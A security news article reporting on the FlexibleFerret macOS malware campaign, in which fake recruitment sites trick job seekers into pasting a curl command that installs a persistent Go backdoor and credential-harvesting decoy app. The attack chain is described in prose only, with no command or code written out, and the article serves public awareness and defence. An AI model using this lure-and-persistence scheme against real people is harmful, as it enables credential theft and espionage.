macOS Users Targeted by New FlexibleFerret Scam

macOS owners across the software-development and job-seeking community are being targeted by cunning social engineering attacks that deploy the malware known as FlexibleFerret. The operation behind these attacks—attributed to a North Korea–linked threat group linked to the “Contagious Interview” campaign—relies on fake recruitment websites that persuade unsuspecting individuals to run malicious Terminal commands under the guise of bogus hiring assessments.

Security researchers from a major threat-intelligence team at Jamf have detailed how this campaign begins: potential victims are lured to sites presenting realistic job listings for roles such as “Blockchain Capital Operations Manager,” complete with interfaces for uploading video introductions and filling application forms. Once the candidate completes the simulated recruitment process, the site displays a prompt warning that camera or microphone access is blocked, urging the user to paste and execute a curl command in the macOS Terminal—a request framed as a requirement for the interview. That command then downloads a shell script and triggers the first stage of infection.

The loader script adapts to the system's hardware architecture to fetch a matching payload, after which it installs a LaunchAgent to ensure the malware persists across reboots. A decoy application—labeled MediaPatcher. app—is launched, presenting permission prompts styled like legitimate macOS system dialogs, followed by a Chrome-style login window designed to harvest the user’s credentials.

Behind the scenes, a Go-based backdoor takes over. Once fully deployed, the malware establishes a connection to a hard-coded command-and-control server, enabling the attackers to collect system information, run arbitrary shell commands, upload or download files, steal browser profile data, and siphon off passwords and other sensitive credentials. Data exfiltration has been observed via legitimate-looking API endpoints such as Dropbox, with additional reconnaissance conducted through services that reveal public IP addresses.

This newer iteration of FlexibleFerret builds on earlier variants of the FERRET malware family, which security providers had already linked to the same campaign earlier in the year. While several older versions were blocked by updates to Apple’s XProtect system, the FlexibleFerret variant currently remains undetected by that defence tool—underscoring how threat actors continue to evolve their methods to defeat platform protections.

Analysts note that those behind the Contagious Interview operation are not relying on a single point of failure. Even when takedowns or blocking occur, they rapidly shift infrastructure, register new domains and roll out fresh recruitment lures. Their continued targeting of both individual developers and broader job-seeker pools suggests an operation that blends cyber espionage motives with potential financial gain.